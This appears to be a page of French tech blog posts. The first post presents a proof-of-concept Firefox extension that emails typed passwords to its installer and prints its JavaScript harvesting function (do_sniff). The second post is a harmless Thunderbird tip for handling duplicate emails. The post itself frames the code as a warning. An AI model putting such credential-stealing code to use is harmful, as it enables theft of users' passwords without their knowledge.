Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Il s’agit plus d’un proof of concept que d’une vraie extension Firefox destinée à être malveillante mais c’est assez interressant de voir ce qu’il est possible de faire avec ce truc.

Cette extension surveille toutes les pages web visitées et repère les champs de mots de passe que l’utilisateur remplit et se fait un plaisir de l’envoyer par email à la personne qui l’a mise en place…(vous si vous êtes un vilain)

Image Hosted by ImageShack.us

Ca passe par le browser donc ce n’est pas filtré par les antivirus et autres firewall…
Bref cela peut être très dangereux surtout si on imagine que de telles fonctions peuvent être intégrées à une extension banale que vous pouvez télécharger sur un site x ou y.

Voici à titre informatif la fonction qui chope vos passwords:

function do_sniff() {
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + ":" + hesla[i].value + "\n";
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
sniff()
}
}

Bref, si ça vous interresse, tout est dispo sur ce site.


Free Image Hosting at www.ImageShack.us

Arf !


Parfois, lorsque vous récupérer des emails dans votre client mail préféré, il arrive que le serveur se déconnecte. Vous récupérez alors 2 fois (voir plus) les mêmes messages et vous êtes obligé de les supprimer à la main.

Heureusement, si vous utilisez Thunderbird, il existe une parade afin d’éviter ces doublons dès la réception.

Il suffit d’aller dans les options de Thunderbird (Outils -> Options (sous Windows) et Edition -> Préférences (sous Linux)).
Cliquez ensuite sur l’icone « Avancé » puis sur le bouton « Editeur de configuration » dans l’onglet « Général« .

Capture d'écran de la boîte de dialogue de suppression de doublons de Thunderbird

Vous aurez alors accès a toute une liste d’options (un peu comme avec le about:config de Firefox). Cherchez celle qui se nomme mail.server.default.dup_action (en le tapant dans le filtre). Faites un clique droit sur cette clé et changez la valeur en mettant le chiffre :

0  si vous voulez charger les mails en double comme d’habitude
1 si vous voulez supprimer automatiquement (et directement) les emails en double dès qu’ils ont été réceptionnés.
2 si vous voulez mettre les mails en double à la poubelle
3 si vous voulez marquer les mails en double comme « Déjà lu »

Bref, je pense que c’est le chiffre 1 qui vous interressera le plus 🙂

Bonne configuration !


Je saiis, je suis a fond sur les vidéos en ce moment mais celle là, je me la met de côté 😉